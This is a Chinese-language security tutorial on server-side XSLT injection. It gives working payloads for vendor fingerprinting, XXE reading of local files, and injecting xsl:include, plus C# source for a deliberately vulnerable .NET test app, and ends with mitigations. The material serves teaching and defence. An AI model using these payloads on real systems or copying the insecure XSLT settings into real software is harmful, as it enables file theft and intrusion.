解析XSLT服務器端注入攻擊
寫在前面的話
可擴展樣式表轉換語言(XSLT)漏洞可以給受影響的應用程序帶來嚴重的安全隱患,一般來說,這種漏洞將允許攻擊者在目標設備上實現遠程代碼執行。目前已公開的XSLT遠程代碼執行漏洞可利用樣本有CVE-2012-5357(影響.Net Ektron CMS)、CVE-2012-1592(影響Apache Struts 2.0)和CVE-2005-3757(影響Google搜索工具)。
從上面這幾個漏洞樣本中我們可以看到,XSLT漏洞已經存在已久了,雖然它不像XML注入、SQL注入或XSS漏洞一樣常見,但是我們經常能夠在安全審計的過程中發現這種漏洞。不過,目前還沒有多少人真正了解針對這種漏洞的利用技術。
在這篇文章中,我們將跟大家分享一些針對XSLT的攻擊案例,并讓大家了解到這項技術的安全缺陷。簡而言之,這種類型的漏洞將允許攻擊者實現遠程代碼執行、從遠程系統中竊取數據、執行網絡掃描、訪問目標用戶內部網絡資源等惡意活動。
除此之外,我們還提供了一個包含了相關XSLT漏洞的簡單應用,并在文章結尾給出了針對此漏洞的緩解方案。
XSLT是什么?
XSL(可擴展樣式表語言)是一種用于轉換XML文檔的語言,XSLT表示的就是XSL轉換,而XSL轉換指的就是XML文檔本身。轉換后得到的一般都是不同的XML文檔或其他類型文檔,例如HTML文檔、CSV文件以及明文文本文件等等。
一般來說,應用程序或模板引擎在處理不同文件類型時需要使用XSLT來進行數據轉換。很多企業級應用比較喜歡使用XSLT,比如說,多用戶發票應用程序可以使用XSLT來允許客戶自定義它們的發票,客戶可以根據自己的需求來修改發票信息以及格式。
其他常見應用:
- 報告功能
- 多種格式的數據導出功能;
- 數據打印和輸出功能;
- 電子郵件;
在介紹攻擊技術之前,我們先來看一看數據轉換的實例。下面這個XML文件包含有多個水果名稱(fruits)以及相關描述:
- <?xml version="1.0" ?>
- <fruits>
- <fruit>
- <name>Lemon</name>
- <description>Yellow and sour</description>
- </fruit>
- <fruit>
- <name>Watermelon</name>
- <description>Round, green outside, red inside</description>
- </fruit>
- </fruits>
接下來,我們可以使用下面這種XSL轉換技術來將XML文檔轉換為明文文本文件:
- <?xml version="1.0" encoding="utf-8"?>
- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
- <xsl:template match="/fruits">
- Fruits:
- <!-- Loop for each fruit -->
- <xsl:for-each select="fruit">
- <!-- Print name: description -->
- - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
- </xsl:for-each>
- </xsl:template>
- </xsl:stylesheet>
轉換之后的明文文本文件內容如下:
- Fruits:
- - Lemon: Yellow and sour
- - Watermelon: Round, green outside, red inside
利用XSLT服務器端注入漏洞
在這一部分,我們將跟大家介紹如何發現并利用應用程序中的XSLT漏洞。下面的樣本使用了微軟的System.Xml XSLT實現,不過類似的技術也應用到了很多類似Libxslt、Saxon和Xalan等常見代碼庫上。
尋找漏洞切入點
首先我們需要識別出應用程序包含漏洞的部分,一般來說這種漏洞會存在于應用程序允許上傳任意XSLT文件的地方。除此之外,如果應用程序存在這種漏洞的話,它很可能會使用不受信任的用戶輸入來動態生成XSL轉換后的XML文檔。
比如說,應用程序可以生成下列XSLT文檔,而字符串“Your Company Name Here”來自于不受信任的用戶輸入。
- <?xml version=”1.0” encoding=”utf-8”?>
- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
- <xsl:template match="/fruits">
- Your Company Name Here
- Fruits:
- <!-- Loop for each fruit -->
- <xsl:for-each select="fruit">
- <!-- Print name: description -->
- - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
- </xsl:for-each>
- </xsl:template>
- <xsl:include href="external_transform.xslt"/>
- </xsl:stylesheet>
為了確認應用程序是否存在這個漏洞,我們可以向其注入一些類似雙引號、單引號以及破折號等特殊字符,因為這類字符可以讓XML文檔中的語句失效。如果服務器返回了錯誤,那么這個應用就很有可能存在漏洞。需要注意的是,這種方法同樣適用于XML注入漏洞。
為了方便演示,我們假設下面給出的樣本允許我們提交任意XSLT文檔。
system-property()函數
不同的代碼庫所實現的XSLT功能也不同,代碼庫A實現了的功能代碼庫B不一定會實現,而且就算實現的是相同的功能,不同代碼庫的實現方式也不同。一般來說,舊版本的代碼庫默認會開啟很多危險的功能,而新版本代碼庫的很多功能往往需要開發人員去手動開啟。
我們可以使用system-property()函數來查看代碼庫的開發者名稱,該功能符合XSLT v1.0標準,所有的代碼庫都實現了這種功能。
有效參數:
- xsl:vendor
- xsl:vendor-url
- xsl:version
下列轉換可以用來確定代碼庫的開發者(vendor):
- <?xml version="1.0" encoding="utf-8"?>
- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
- <xsl:template match="/fruits">
- <xsl:value-of select="system-property('xsl:vendor')"/>
- </xsl:template>
- </xsl:stylesheet>
由于我們的測試目標使用的是Microsoft .Net System.xml實現,因此返回的結果為“Microsoft”:
- Microsoft
XXE與數據提取
除了常見的XML攻擊之外,XXE攻擊同樣可以影響XSLT。在下面的樣本中,我們使用一個外部實體讀取出了“C:\secretfruit.txt”文件的內容:
- <?xml version="1.0" encoding="utf-8"?>
- <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
- <xsl:template match="/fruits">
- Fruits &ext_file;:
- <!-- Loop for each fruit -->
- <xsl:for-each select="fruit">
- <!-- Print name: description -->
- - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
- </xsl:for-each>
- </xsl:template>
- </xsl:stylesheet>
ENTITY元素將文件內容存儲在了“ext_file”引用中,隨后我們可以用“&ext_file;”語句將內容存儲在了主文檔中。輸出數據則包含了文件中的秘密內容(“Golden Apple”):
- Fruits Golden Apple:
- - Lemon: Yellow and sour
- - Watermelon: Round, green outside, red inside
這項技術可以用來遠程獲取存儲在本地Web服務器中的文件內容,這些文件可以是包含了憑證數據的配置文件或者是包含了敏感信息的文件等等。除此之外,攻擊者還可以通過UNC (\\servername\share\file)路徑或者URL (http://servername/file)來獲取目標內部網絡系統中托管的文件。
Import和Include
import和include標簽可以用來合并多個XSLT文檔,如果我們只能在XSLT文檔中間注入內容的話,我們也許就不能直接使用XML外部實體(XXE)攻擊或腳本來進行攻擊了,因為這些攻擊技術要求我們在文檔頭部實現內容注入。
我們還是使用之前那個XSLT文檔來進行演示:
- <?xml version=”1.0” encoding=”utf-8"?>
- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
- <xsl:template match="/fruits">
- Your Company Name Here
- Fruits:
- <!-- Loop for each fruit -->
- <xsl:for-each select="fruit">
- <!-- Print name: description -->
- - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
- </xsl:for-each>
- </xsl:template>
- <xsl:include href="external_transform.xslt"/>
- </xsl:stylesheet>
我們需要include下面這個名為“external_transform.xslt”的外部XSLT文件:
- <?xml version=”1.0” encoding=”utf-8”?>
- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
- <xsl:template match="/">
- Hello from the external transformation
- </xsl:template>
- </xsl:stylesheet>
為了include外部文檔,我們需要注入下列標簽:
- <xsl:include href="external_transform.xslt"/>
但是這里有一個問題,即“xsl:include”標簽無法包含在一個“xsl:template”標簽中,而且生成的文件必須是XML文檔。
因此,我們首先需要閉合“xsl:template”標簽,然后添加“xsl:include”標簽,最終的Payload如下:
- </xsl:template><xsl:include href="external_transform.xslt"/><xsl:template name="a">
注入完成之后,生成的XSLT文檔如下:
- <?xml version="1.0" encoding="utf-8"?>
- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
- <xsl:template match="/fruits">
- </xsl:template><xsl:include href="external_transform.xslt"/><xsl:template name="a">
- Fruits:
- <!-- Loop for each fruit -->
- <xsl:for-each select="fruit">
- <!-- Print name: description -->
- - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
- </xsl:for-each>
- </xsl:template>
- <xsl:include href="external_transform.xslt"/>
- </xsl:stylesheet>
轉換結果如下:
- Hello from the external transformation
注:在XXE和document()函數的幫助下,“include”和“import”標簽同樣可以用來進行提取數據以及端口掃描等操作。
可用于測試XSLT漏洞的App
為了給大家提供一種快速測試Payload的方法,我們專門開發了一款包含XSLT漏洞的小型.Net應用,這款應用使用了.Net的System.Xml實現。
下面給出的是應用的源代碼,你可以使用Microsoft Visual Studio對其進行編譯。應用程序的源代碼以及編譯版本可點擊【這里】獲取。源代碼如下:
- using System;
- using System.Xml;
- using System.Xml.Xsl;
- namespace XsltConsoleApplication
- {
- class Program
- {
- /*
- This code contains serious vulnerabilities and is provided for training purposes only!
- DO NOT USE ANYWHERE FOR ANYTHING ELSE!!!
- */
- static void Main(string[] args)
- {
- Console.WriteLine("\n#####################################################################");
- Console.WriteLine("# #");
- Console.WriteLine("# This is a Vulnerable-by-Design application to test XSLT Injection #");
- Console.WriteLine("# #");
- Console.WriteLine("#####################################################################\n");
- Console.WriteLine("The application expects (in the current working directory):");
- Console.WriteLine(" - an XML file (data.xml) and\n - an XSLT style sheet (transform.xslt)\n");
- Console.WriteLine("===================================================================");
- String transformationXsltFileURI = "transform.xslt";
- String dataXMLFileURI = "data.xml";
- // Enable DTD processing to load external XML entities for both the XML and XSLT file
- XmlReaderSettings vulnerableXmlReaderSettings = new XmlReaderSettings();
- vulnerableXmlReaderSettings.DtdProcessing = DtdProcessing.Parse;
- vulnerableXmlReaderSettings.XmlResolver = new XmlUrlResolver();
- XmlReader vulnerableXsltReader = XmlReader.Create(transformationXsltFileURI, vulnerableXmlReaderSettings);
- XmlReader vulnerableXmlReader = XmlReader.Create(dataXMLFileURI, vulnerableXmlReaderSettings);
- XsltSettings vulnerableSettings = new XsltSettings();
- // Embedded script blocks and the document() function are NOT enabled by default
- vulnerableSettings.EnableDocumentFunction = true;
- vulnerableSettings.EnableScript = true;
- // A vulnerable settings class can also be created with:
- // vulnerableSettings = XsltSettings.TrustedXslt;
- XslCompiledTransform vulnerableTransformation = new XslCompiledTransform();
- // XmlUrlResolver is the default resolver for XML and XSLT and supports the file: and http: protocols
- XmlUrlResolver vulnerableResolver = new XmlUrlResolver();
- vulnerableTransformation.Load(vulnerableXsltReader, vulnerableSettings, vulnerableResolver);
- XmlWriter output = new XmlTextWriter(Console.Out);
- // Run the transformation
- vulnerableTransformation.Transform(vulnerableXmlReader, output);
- }
- }
- }
注:該應用要求當前工作目錄中存儲data.xml和transformation.xslt文件。
緩解方案
如果你的應用程序使用了XSLT,那我建議你可以考慮以下緩解方案:
- 盡可能避免用戶提供的XSLT文檔;
- 不要使用不受信任的輸入來生成XSLT文檔,例如拼接的字符串。如果你需要使用非靜態值,你可以選擇從XML數據文件或者XSLT文檔中獲取。
- 禁用XSLT代碼庫實現的所有危險功能,因為代碼庫的默認配置通常都是不安全的。確保禁用嵌入式腳本擴展,以及其他允許讀寫外部文件的專用擴展。
如果你想了解更多關于熱門XSLT代碼庫的功能以及相應的默認配置,可以參考Emanuel Duss 和Roland Bischofberger發布的文檔【參考文獻】。
總結
對于很多應用程序來說,XSLT雖然是一種功能強大的工具,但它也有很多不為人知的弱點。不良的編碼習慣將有可能讓應用程序出現安全漏洞,而這些漏洞將有可能允許攻擊者遠程控制你的應用程序并從中提取數據。
